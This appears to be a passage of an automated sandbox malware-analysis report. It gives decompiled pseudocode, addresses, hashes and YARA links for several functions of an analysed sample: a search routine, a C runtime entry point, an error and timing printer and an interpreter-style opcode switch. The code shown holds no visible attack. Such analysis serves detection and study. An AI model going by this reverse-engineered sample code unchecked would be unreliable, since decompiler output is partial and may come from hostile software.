                                                                    • Instruction Fuzzy Hash: 2371FBBB60D2928ED3559F3DA0514EAFBE1EFAA310725987FD2C0C7351E231049AC768
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10008300, Relevance: .2, Instructions: 150COMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E10008300(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed char _v12;
				intOrPtr _t69;
				intOrPtr _t72;
				signed char _t73;
				intOrPtr _t80;
				intOrPtr _t88;
				signed char _t90;
				intOrPtr* _t104;
				intOrPtr _t109;
				intOrPtr* _t111;
				void* _t112;
				intOrPtr _t113;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t119;
				void* _t128;
				intOrPtr _t129;

				_t72 = _a12;
				_t111 = _a4;
				_t69 = 0;
				_t88 =  *((intOrPtr*)(_t111 + 4));
				_v8 =  *_t111;
				if(_t72 < _t88) {
					L37:
					return _t72;
				}
				_t90 =  *(_t111 + 0x408);
				_t109 = _a8;
				_v12 = _t90;
				if((_t90 & 0x00000001) == 0) {
					while(1) {
						_t112 = 0;
						if(_t88 <= 0) {
							goto L27;
						}
						_t128 = _t69 + _t109;
						while( *((intOrPtr*)(_t112 + _v8)) ==  *((intOrPtr*)(_t112 + _t128))) {
							_t112 = _t112 + 1;
							if(_t112 < _t88) {
								continue;
							} else {
								_t90 = _v12;
							}
							goto L27;
						}
						L36:
						_t69 = _t69 +  *((intOrPtr*)(_a4 + 8));
						if(_t69 <= _t72 - _t88) {
							_t90 = _v12;
							continue;
						} else {
							goto L37;
						}
						goto L39;
						L27:
						if((_t90 & 0x00000002) == 0) {
							if((_t90 & 0x00000004) != 0 && _t69 != 0) {
								_t113 =  *0x1000d2d4; // 0x2160846
								if( *((char*)(0 + _t113)) != 0) {
									goto L36;
								}
							}
						} else {
							if(_t69 == 0) {
								L30:
								if(_t88 + _t69 != _t72) {
									_t117 =  *0x1000d2d4; // 0x2160846
									if( *((char*)(0 + _t117)) != 0) {
										goto L36;
									}
								}
							} else {
								_t118 =  *0x1000d2d4; // 0x2160846
								if( *((char*)(0 + _t118)) != 0) {
									goto L36;
								} else {
									goto L30;
								}
							}
						}
						goto L38;
					}
				} else {
					_t104 =  *0x1000d2f8; // 0x2160446
					_t129 =  *0x1000d2d4; // 0x2160846
					do {
						_t119 = 0;
						if(_t88 <= 0) {
							L8:
							_t73 = _v12;
							if((_t73 & 0x00000002) == 0) {
								if((_t73 & 0x00000004) == 0 || _t69 == 0 ||  *((char*)(0 + _t129)) == 0) {
									goto L38;
								} else {
									goto L19;
								}
							} else {
								if(_t69 == 0 ||  *((char*)(0 + _t129)) == 0) {
									if(_t88 + _t69 == _a12 ||  *((char*)(0 + _t129)) == 0) {
										L38:
										return _t69;
									} else {
										goto L19;
									}
								} else {
									goto L19;
								}
							}
						} else {
							while(1) {
								_v4 = 0;
								_t104 =  *0x1000d2f8; // 0x2160446
								if( *_t104 !=  *((intOrPtr*)(_t104 + _v4))) {
									break;
								}
								_t119 = _t119 + 1;
								if(_t119 < _t88) {
									continue;
								} else {
									_t109 = _a8;
									_t129 =  *0x1000d2d4; // 0x2160846
									goto L8;
								}
								goto L39;
							}
							_t109 = _a8;
							_t129 =  *0x1000d2d4; // 0x2160846
							goto L19;
						}
						goto L39;
						L19:
						_t69 = _t69 +  *((intOrPtr*)(_a4 + 8));
						_t80 = _a12;
					} while (_t69 <= _t80 - _t88);
					return _t80;
				}
				L39:
			}






















                                                                    0x10008304
                                                                    0x1000830a
                                                                    0x1000830e
                                                                    0x10008311
                                                                    0x10008318
                                                                    0x1000831c
                                                                    0x100084b3
                                                                    0x00000000
                                                                    0x100084b3
                                                                    0x10008322
                                                                    0x10008328
                                                                    0x1000832f
                                                                    0x10008333
                                                                    0x10008424
                                                                    0x10008424
                                                                    0x10008428
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000842a
                                                                    0x1000842d
                                                                    0x10008439
                                                                    0x1000843c
                                                                    0x00000000
                                                                    0x1000843e
                                                                    0x1000843e
                                                                    0x1000843e
                                                                    0x00000000
                                                                    0x1000843c
                                                                    0x10008495
                                                                    0x100084a7
                                                                    0x100084ad
                                                                    0x10008420
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10008442
                                                                    0x10008445
                                                                    0x1000847d
                                                                    0x10008483
                                                                    0x10008493
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10008493
                                                                    0x10008447
                                                                    0x10008449
                                                                    0x1000845d
                                                                    0x10008462
                                                                    0x1000846c
                                                                    0x10008476
                                                                    0x00000000
                                                                    0x10008478
                                                                    0x10008476
                                                                    0x1000844b
                                                                    0x1000844b
                                                                    0x1000845b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000845b
                                                                    0x10008449
                                                                    0x00000000
                                                                    0x10008445
                                                                    0x10008339
                                                                    0x10008339
                                                                    0x1000833f
                                                                    0x10008345
                                                                    0x10008345
                                                                    0x10008349
                                                                    0x10008384
                                                                    0x10008384
                                                                    0x1000838b
                                                                    0x100083c3
                                                                    0x00000000
                                                                    0x100083e1
                                                                    0x00000000
                                                                    0x100083e1
                                                                    0x1000838d
                                                                    0x1000838f
                                                                    0x100083a6
                                                                    0x100084bc
                                                                    0x100084bc
                                                                    0x100083be
                                                                    0x00000000
                                                                    0x100083be
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000838f
                                                                    0x1000834b
                                                                    0x1000834d
                                                                    0x1000835d
                                                                    0x10008363
                                                                    0x10008373
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10008375
                                                                    0x10008378
                                                                    0x00000000
                                                                    0x1000837a
                                                                    0x1000837a
                                                                    0x1000837e
                                                                    0x00000000
                                                                    0x1000837e
                                                                    0x00000000
                                                                    0x10008378
                                                                    0x100083e3
                                                                    0x100083e7
                                                                    0x00000000
                                                                    0x100083e7
                                                                    0x00000000
                                                                    0x100083ed
                                                                    0x10008400
                                                                    0x10008404
                                                                    0x1000840c
                                                                    0x1000841d
                                                                    0x1000841d
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8541f79a5917ebf91703c51342671e0f2fce44a9db1cf0587c90437a07ee874
                                                                    • Instruction ID: d05f88d7f58b849e829ed68ad8b4b62817e379a5dedabc82ffe129ed719ec729
                                                                    • Opcode Fuzzy Hash: e8541f79a5917ebf91703c51342671e0f2fce44a9db1cf0587c90437a07ee874
                                                                    • Instruction Fuzzy Hash: E2518331A083934BE321DF258480766FBE2FB992C4F5A456CCAC05735AD735EE46C790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401D20, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x402128);
				_push(0x401ea0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x403554 =  *0x403554 | 0xffffffff;
				 *0x403558 =  *0x403558 | 0xffffffff;
				_t23 = __p__fmode();
				_t45 =  *0x4032cc; // 0x0
				 *_t23 = _t45;
				_t24 = __p__commode();
				_t46 =  *0x4032c8; // 0x0
				 *_t24 = _t46;
				 *0x40355c = _adjust_fdiv;
				_t27 = E00401E9F( *_adjust_fdiv);
				_t60 =  *0x4032bc; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E00401E9C);
				}
				E00401E8A(_t27);
				_push(0x40300c);
				_push(0x403008);
				L00401E84();
				_t29 =  *0x4032c4; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x4032c0,  &_v112);
				_push(0x403004);
				_push(0x403000);
				L00401E84();
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while( *_t54 > 0x20) {
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t41 =  *_t54;
					} while (_t41 != 0 && _t41 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t54);
				_push(0);
				_t39 = GetModuleHandleA(0);
				_push(_t39);
				E004018D0();
				_v108 = _t39;
				exit(_t39);
				_t40 = _v24;
				_t48 =  *((intOrPtr*)( *_t40));
				_v124 = _t48;
				_push(_t40);
				_push(_t48);
				L00401E7E();
				return _t40;
			}





























                                                                    0x00401d23
                                                                    0x00401d25
                                                                    0x00401d2a
                                                                    0x00401d35
                                                                    0x00401d36
                                                                    0x00401d43
                                                                    0x00401d48
                                                                    0x00401d4d
                                                                    0x00401d54
                                                                    0x00401d5b
                                                                    0x00401d62
                                                                    0x00401d68
                                                                    0x00401d6e
                                                                    0x00401d70
                                                                    0x00401d76
                                                                    0x00401d7c
                                                                    0x00401d85
                                                                    0x00401d8a
                                                                    0x00401d8f
                                                                    0x00401d95
                                                                    0x00401d9c
                                                                    0x00401da2
                                                                    0x00401da3
                                                                    0x00401da8
                                                                    0x00401dad
                                                                    0x00401db2
                                                                    0x00401db7
                                                                    0x00401dbc
                                                                    0x00401dd5
                                                                    0x00401ddb
                                                                    0x00401de0
                                                                    0x00401de5
                                                                    0x00401df2
                                                                    0x00401df4
                                                                    0x00401dfa
                                                                    0x00401e36
                                                                    0x00401e3b
                                                                    0x00401e3c
                                                                    0x00401e3c
                                                                    0x00401dfc
                                                                    0x00401dfc
                                                                    0x00401dfc
                                                                    0x00401dfd
                                                                    0x00401e00
                                                                    0x00401e02
                                                                    0x00401e0d
                                                                    0x00401e0f
                                                                    0x00401e0f
                                                                    0x00401e10
                                                                    0x00401e10
                                                                    0x00401e0d
                                                                    0x00401e13
                                                                    0x00401e17
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401e1d
                                                                    0x00401e24
                                                                    0x00401e2e
                                                                    0x00401e43
                                                                    0x00401e30
                                                                    0x00401e30
                                                                    0x00401e30
                                                                    0x00401e44
                                                                    0x00401e45
                                                                    0x00401e46
                                                                    0x00401e48
                                                                    0x00401e4e
                                                                    0x00401e4f
                                                                    0x00401e54
                                                                    0x00401e58
                                                                    0x00401e5e
                                                                    0x00401e63
                                                                    0x00401e65
                                                                    0x00401e68
                                                                    0x00401e69
                                                                    0x00401e6a
                                                                    0x00401e71

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.322893653.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.322884038.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322913999.0000000000402000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322924635.0000000000403000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322942646.0000000000404000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                    • String ID:
                                                                    • API String ID: 801014965-0
                                                                    • Opcode ID: 143c9e8dcc1ab551373f0120bfaca85027ae735a0a25819c23ff821b8df6a2f8
                                                                    • Instruction ID: 9889600cf3eb4391f8ce6d24981125143470c5a89cbfe14180cb2d50d5b3fc35
                                                                    • Opcode Fuzzy Hash: 143c9e8dcc1ab551373f0120bfaca85027ae735a0a25819c23ff821b8df6a2f8
                                                                    • Instruction Fuzzy Hash: 71417075800344AFDB209FA4DA49AAEBFB8FB09711F20013FE941B72E0D7785940CB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10004280, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 40%
                                                                    			E10004280(void* __edi, void* __ebp, intOrPtr* _a4) {
				signed int _t48;
				void* _t52;
				long _t57;
				intOrPtr _t58;
				intOrPtr _t76;
				intOrPtr _t79;
				signed int _t82;
				char* _t86;
				void* _t96;
				signed int _t98;
				intOrPtr* _t100;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t106;

				_t101 = __ebp;
				_t96 = __edi;
				_t100 = _a4;
				if(( *(_t100 + 4) & 0x00020000) == 0) {
					if(( *0x1000d320 & 0x00000002) != 0) {
						goto L21;
					}
					goto L6;
				} else {
					_t76 =  *0x1000d358; // 0x0
					_t86 = "Compile error [ 0x%X %i ]: ";
					if(_t76 == 0) {
						_t86 = "Run-time error [ 0x%X %i ]: ";
					}
					_push( *_t100);
					E10004240(_t86,  *_t100);
					_t79 =  *((intOrPtr*)(_t100 + 0xc));
					_t104 = _t104 + 0xc;
					if(_t79 != 0) {
						_t88 =  *(_t100 + 8);
						_push( *((intOrPtr*)(_t100 + 0x10)));
						_push(_t79);
						E10004240("%s\r\n[ Line: %i Pos: %i ] ",  *(_t100 + 8));
						_t104 = _t104 + 0x10;
					}
					L6:
					_t48 =  *(_t100 + 4);
					if((_t48 & 0x02000000) == 0) {
						if((_t48 & 0x04000000) == 0) {
							if((_t48 & 0x00010000) == 0) {
								if((_t48 & 0x01000000) == 0) {
									_t88 =  *(_t100 + 0x1c);
									_push( *(_t100 + 0x1c));
									E10004240();
									_t105 = _t104 + 4;
								} else {
									E10004240( *(_t100 + 0x1c),  *((intOrPtr*)(_t100 + 0x18)));
									_t105 = _t104 + 8;
								}
							} else {
								_t88 =  *(_t100 + 0x1c);
								E10004240( *(_t100 + 0x1c),  *((intOrPtr*)(_t100 + 0x14)));
								_t105 = _t104 + 8;
							}
						} else {
							_push( *((intOrPtr*)(_t100 + 0x18)));
							E10004240( *(_t100 + 0x1c),  *((intOrPtr*)(_t100 + 0x18)));
							_t105 = _t104 + 0xc;
						}
					} else {
						_t88 =  *(_t100 + 0x1c);
						_push( *((intOrPtr*)(_t100 + 0x14)));
						_push( *((intOrPtr*)(_t100 + 0x18)));
						E10004240( *(_t100 + 0x1c),  *((intOrPtr*)(_t100 + 0x18)));
						_t105 = _t104 + 0x10;
					}
					_push("\r\n");
					E10004240();
					_t106 = _t105 + 4;
					_t52 =  *_t100 - 1;
					if(_t52 == 0) {
						 *0x1000d2c4 = GetTickCount();
					} else {
						if(_t52 == 1) {
							_push(_t101);
							_push(_t96);
							_t57 = GetTickCount();
							_t58 =  *0x1000d2c4; // 0x0
							_t82 = _t57 - _t58;
							_t98 = _t82 % 0xea60;
							_push(_t98 % 0x3e8);
							_push(0x10624dd3 * _t98 >> 0x20 >> 6);
							_t88 = 0x45e7b273 * _t82 >> 0x20 >> 0xe;
							E10004240("Summary Time: %i:%i:%i\r\n", 0x45e7b273 * _t82 >> 0x20 >> 0xe);
							_t106 = _t106 + 0x10;
						}
					}
					if(( *(_t100 + 4) & 0x00020000) != 0) {
						_push("\r\nPress any key...\r\n");
						E10004240();
						E10005E70(_t88);
					}
					L21:
					return 0;
				}
			}


















                                                                    0x10004280
                                                                    0x10004280
                                                                    0x10004281
                                                                    0x1000428c
                                                                    0x100042d4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000428e
                                                                    0x1000428e
                                                                    0x10004293
                                                                    0x1000429a
                                                                    0x1000429c
                                                                    0x1000429c
                                                                    0x100042a3
                                                                    0x100042a6
                                                                    0x100042ab
                                                                    0x100042ae
                                                                    0x100042b3
                                                                    0x100042b8
                                                                    0x100042bb
                                                                    0x100042bc
                                                                    0x100042c3
                                                                    0x100042c8
                                                                    0x100042c8
                                                                    0x100042da
                                                                    0x100042da
                                                                    0x100042e2
                                                                    0x10004300
                                                                    0x1000431a
                                                                    0x10004333
                                                                    0x10004347
                                                                    0x1000434a
                                                                    0x1000434b
                                                                    0x10004350
                                                                    0x10004335
                                                                    0x1000433d
                                                                    0x10004342
                                                                    0x10004342
                                                                    0x1000431c
                                                                    0x1000431f
                                                                    0x10004324
                                                                    0x10004329
                                                                    0x10004329
                                                                    0x10004302
                                                                    0x10004305
                                                                    0x1000430b
                                                                    0x10004310
                                                                    0x10004310
                                                                    0x100042e4
                                                                    0x100042ea
                                                                    0x100042ed
                                                                    0x100042ee
                                                                    0x100042f1
                                                                    0x100042f6
                                                                    0x100042f6
                                                                    0x10004353
                                                                    0x10004358
                                                                    0x1000435f
                                                                    0x10004362
                                                                    0x10004363
                                                                    0x100043bf
                                                                    0x10004365
                                                                    0x10004366
                                                                    0x10004368
                                                                    0x10004369
                                                                    0x1000436a
                                                                    0x10004372
                                                                    0x10004377
                                                                    0x10004389
                                                                    0x10004396
                                                                    0x100043a1
                                                                    0x100043a4
                                                                    0x100043ad
                                                                    0x100043b2
                                                                    0x100043b6
                                                                    0x10004366
                                                                    0x100043cb
                                                                    0x100043cd
                                                                    0x100043d2
                                                                    0x100043da
                                                                    0x100043da
                                                                    0x100043df
                                                                    0x100043e2
                                                                    0x100043e2

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 1000436A
                                                                    • GetTickCount.KERNEL32 ref: 100043B9
                                                                      • Part of subcall function 10004240: vsprintf.MSVCRT ref: 10004258
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountTick$vsprintf
                                                                    • String ID: Press any key...$%s[ Line: %i Pos: %i ] $Compile error [ 0x%X %i ]: $Run-time error [ 0x%X %i ]: $Summary Time: %i:%i:%i
                                                                    • API String ID: 3964146895-2992983336
                                                                    • Opcode ID: fb219ae7bc5e3754048a8c75435143f0b73f70548fed37221171dea3b9a7ae21
                                                                    • Instruction ID: 5a03128a077f208a78a2de5e596b407fc28f85d3173b41968825e96d7eba73eb
                                                                    • Opcode Fuzzy Hash: fb219ae7bc5e3754048a8c75435143f0b73f70548fed37221171dea3b9a7ae21
                                                                    • Instruction Fuzzy Hash: CE3191F5B007009BF264EB58EC81E2B72E9DB842C4B468518FD468365DEE20FD54C665
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10001180, Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E10001180(void* __edx, void* __fp0, signed int _a4) {
				signed int _v4;
				signed int _v8;
				signed int _t99;
				signed int _t102;
				signed int _t103;
				intOrPtr _t105;
				signed int _t106;

				_t99 = _a4;
				_t105 =  *((intOrPtr*)(_t99 + 8));
				_t103 =  *(_t105 - 4);
				_t106 =  *(_t105 - 8);
				_t102 =  *((intOrPtr*)( *((intOrPtr*)(_t99 + 4)))) + 0xffffffa0;
				_a4 = _t103;
				if(_t102 > 0x25) {
					return _t102;
				} else {
					switch( *((intOrPtr*)(_t102 * 4 +  &M10001460))) {
						case 0:
							 *(_t105 - 8) = _t106 * _t103;
							return _t102;
							goto L41;
						case 1:
							__eax = __esi;
							asm("cdq");
							_t11 = __eax % __ecx;
							__eax = __eax / __ecx;
							__edx = _t11;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 2:
							__eax = __esi;
							asm("cdq");
							_t16 = __eax % __ecx;
							__eax = __eax / __ecx;
							__edx = _t16;
							 *(__edi - 8) = _t16;
							return __eax;
							goto L41;
						case 3:
							 *(__edi - 8) = __esi;
							return __eax;
							goto L41;
						case 4:
							 *(__edi - 8) = __esi;
							return __eax;
							goto L41;
						case 5:
							 *(__edi - 4) = __ecx;
							return __eax;
							goto L41;
						case 6:
							__edx = 0;
							_t24 = __esi - __ecx < 0;
							__edx = 0 | _t24;
							 *(__edi - 8) = _t24;
							return __eax;
							goto L41;
						case 7:
							__eax = 0;
							__eax = 0 | __esi - __ecx > 0x00000000;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 8:
							__edx =  *__esi;
							__edx =  *__esi * __ecx;
							__eax = __edx;
							 *__esi = __edx;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 9:
							__eax =  *__esi;
							asm("cdq");
							_t31 = __eax % __ecx;
							__eax = __eax / __ecx;
							__edx = _t31;
							 *__esi = __eax;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0xa:
							__eax =  *__esi;
							asm("cdq");
							_t36 = __eax % __ecx;
							__eax = __eax / __ecx;
							__edx = _t36;
							__eax = __edx;
							 *__esi = __edx;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0xb:
							__eax =  *__esi;
							__eax =  *__esi << __cl;
							 *__esi = __eax;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0xc:
							__eax =  *__esi;
							__eax =  *__esi >> __cl;
							 *__esi = __eax;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0xd:
							__al =  *__esi;
							__edx = __eax * __cl >> 0x20;
							__eax = __eax * __cl;
							__ecx = __al;
							 *__esi = __al;
							 *(__edi - 8) = __al;
							return __eax;
							goto L41;
						case 0xe:
							__eax =  *__esi;
							asm("cdq");
							_t48 = __eax % __ecx;
							__eax = __eax / __ecx;
							__edx = _t48;
							__ecx = __al;
							 *__esi = __al;
							 *(__edi - 8) = __al;
							return __eax;
							goto L41;
						case 0xf:
							__eax =  *__esi;
							asm("cdq");
							_t53 = __eax % __ecx;
							__eax = __eax / __ecx;
							__edx = _t53;
							__ecx = __dl;
							 *__esi = __dl;
							 *(__edi - 8) = __dl;
							return __eax;
							goto L41;
						case 0x10:
							__al =  *__esi;
							__al =  *__esi << __cl;
							__ecx = __al;
							 *__esi = __al;
							 *(__edi - 8) = __al;
							return __eax;
							goto L41;
						case 0x11:
							__al =  *__esi;
							__al =  *__esi >> __cl;
							__ecx = __al;
							 *__esi = __al;
							 *(__edi - 8) = __al;
							return __eax;
							goto L41;
						case 0x12:
							__dx =  *__esi;
							__dx =  *__esi * __cx;
							__eax = __dx;
							 *__esi = __dx;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0x13:
							__eax =  *__esi;
							asm("cdq");
							_t61 = __eax % __ecx;
							__eax = __eax / __ecx;
							__edx = _t61;
							 *__esi = __ax;
							__eax = __ax;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0x14:
							__eax =  *__esi;
							asm("cdq");
							_t66 = __eax % __ecx;
							__eax = __eax / __ecx;
							__edx = _t66;
							__eax = __dx;
							 *__esi = __dx;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0x15:
							 *__esi =  *__esi << __cl;
							__eax =  *__esi;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0x16:
							 *__esi =  *__esi >> __cl;
							__eax =  *__esi;
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0x17:
							__fp0 =  *(__edi - 8);
							return __eax;
							goto L41;
						case 0x18:
							__fp0 =  *(__edi - 8);
							L10008FD0();
							 *(__edi - 8) = __eax;
							return __eax;
							goto L41;
						case 0x19:
							__fp0 =  *(__edi - 8);
							L10008FD0();
							 *(__edi - 8) = __eax;
							 *(__edi - 4) = __edx;
							return __eax;
							goto L41;
						case 0x1a:
							__fp0 =  *(__edi - 4);
							return __eax;
							goto L41;
						case 0x1b:
							__fp0 =  *(__edi - 4);
							L10008FD0();
							 *(__edi - 4) = __eax;
							return __eax;
							goto L41;
						case 0x1c:
							__fp0 =  *(__edi - 4);
							L10008FD0();
							 *(__edi - 4) = __eax;
							 *__edi = __edx;
							return __eax;
							goto L41;
						case 0x1d:
							asm("fild dword [esp+0x14]");
							 *(__edi - 4) = __fp0;
							return __eax;
							goto L41;
						case 0x1e:
							asm("fild dword [esp+0x14]");
							 *(__edi - 4) = __fp0;
							return __eax;
							goto L41;
						case 0x1f:
							__eax = __ecx;
							asm("cdq");
							 *(__edi - 4) = __eax;
							 *__edi = __edx;
							return __eax;
							goto L41;
						case 0x20:
							asm("fild qword [edi-0x8]");
							 *(__edi - 8) = __fp0;
							return __eax;
							goto L41;
						case 0x21:
							asm("fild qword [edi-0x8]");
							 *(__edi - 8) = __fp0;
							return __eax;
							goto L41;
						case 0x22:
							__ecx =  *(__edi - 8);
							return __eax;
							goto L41;
						case 0x23:
							_v8 = __ecx;
							_v4 = 0;
							asm("fild qword [esp+0x8]");
							 *(__edi - 4) = __fp0;
							return __eax;
							goto L41;
						case 0x24:
							_v8 = __ecx;
							_v4 = 0;
							asm("fild qword [esp+0x8]");
							 *(__edi - 4) = __fp0;
							return __eax;
							goto L41;
						case 0x25:
							 *(__edi - 4) = __ecx;
							 *__edi = 0;
							return __eax;
					}
				}
				L41:
			}










                                                                    0x10001183
                                                                    0x10001189
                                                                    0x10001191
                                                                    0x10001194
                                                                    0x10001197
                                                                    0x1000119d
                                                                    0x100011a1
                                                                    0x1000145c
                                                                    0x100011a7
                                                                    0x100011a7
                                                                    0x00000000
                                                                    0x100011b1
                                                                    0x100011b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100011bc
                                                                    0x100011be
                                                                    0x100011bf
                                                                    0x100011bf
                                                                    0x100011bf
                                                                    0x100011c1
                                                                    0x100011c9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100011cc
                                                                    0x100011ce
                                                                    0x100011cf
                                                                    0x100011cf
                                                                    0x100011cf
                                                                    0x100011d1
                                                                    0x100011d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100011de
                                                                    0x100011e6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100011eb
                                                                    0x100011f3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100011f8
                                                                    0x10001200
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001203
                                                                    0x10001207
                                                                    0x10001207
                                                                    0x1000120a
                                                                    0x10001212
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001215
                                                                    0x10001219
                                                                    0x1000121c
                                                                    0x10001224
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001227
                                                                    0x10001229
                                                                    0x1000122c
                                                                    0x1000122e
                                                                    0x10001230
                                                                    0x10001238
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000123b
                                                                    0x1000123d
                                                                    0x1000123e
                                                                    0x1000123e
                                                                    0x1000123e
                                                                    0x10001240
                                                                    0x10001242
                                                                    0x1000124a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x1000124d
                                                                    0x1000124f
                                                                    0x10001250
                                                                    0x10001250
                                                                    0x10001250
                                                                    0x10001252
                                                                    0x10001254
                                                                    0x10001256
                                                                    0x1000125e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001261
                                                                    0x10001263
                                                                    0x10001265
                                                                    0x10001267
                                                                    0x1000126f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001272
                                                                    0x10001274
                                                                    0x10001276
                                                                    0x10001278
                                                                    0x10001280
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001283
                                                                    0x10001285
                                                                    0x10001285
                                                                    0x10001287
                                                                    0x1000128a
                                                                    0x1000128c
                                                                    0x10001294
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10001297
                                                                    0x1000129a
                                                                    0x1000129b
                                                                    0x1000129b
                                                                    0x1000129b
                                                                    0x1000129d
                                                                    0x100012a0
                                                                    0x100012a2
                                                                    0x100012aa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100012ad
                                                                    0x100012b0
                                                                    0x100012b1
                                                                    0x100012b1
                                                                    0x100012b1
                                                                    0x100012b3
                                                                    0x100012b6
                                                                    0x100012b8
                                                                    0x100012c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100012c3
                                                                    0x100012c5
                                                                    0x100012c7
                                                                    0x100012ca
